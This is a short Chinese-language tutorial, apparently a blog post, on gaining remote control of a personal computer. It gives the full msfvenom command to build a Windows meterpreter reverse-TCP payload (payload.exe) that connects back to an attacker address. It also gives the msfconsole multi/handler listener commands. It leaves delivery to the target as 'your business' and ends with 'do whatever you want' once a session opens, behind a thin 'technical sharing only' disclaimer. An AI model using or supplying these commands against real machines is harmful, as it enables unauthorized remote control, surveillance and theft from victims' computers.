如何拿捏个人电脑

提前声明：本文内容只用于技术分享，如被用作其他用途，所产生的后果与本作者无关

本篇分享如何对个人电脑达到远程操作的目的。

第一步：你需要用Kali做一个被控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.199 lport=5000 -f exe -o /root/payload.exe
1

-p：使用反向远程控制程序“windows/meterpreter/reverse_tcp”，这不是个文件路径直接用就行
lhost：主控端的地址
lport：主控端端口
-f：文件的类型为exe类型
-o：生成被控端名为payload.exe，保存在kali的/root目录下

被控端生成后，怎么放到目标电脑上是你的事，本篇准备了一个Win10虚拟机

第二步：在Kali这里打开主控端会话，执行无参数msfconsole命令

msfconsole
1

等待日志输出完成，会打开如下会话

在会话中输入如下命令，启动主控端的监听程序

use exploit/multi/handler
1

设置被控端程序

set payload windows/meterpreter/reverse_tcp
1

主控端声明一个IP，要和你生成被控程序时用的一样

set lhost 192.168.31.199
set lport 5000
1
2

执行命令，开始监听被控程序

exploit
1

第三步：目标电脑触发被控程序，就是等目标运行了被控程序后，你在主控端会收到一条日志，并出现控制会话

此时你就可以做你想做的事情了，注意操作时最好是先运行一下help命令，看一下这个工具可以支持哪些命令，且一般触发后，主控端所处在被控程序被触发的目录中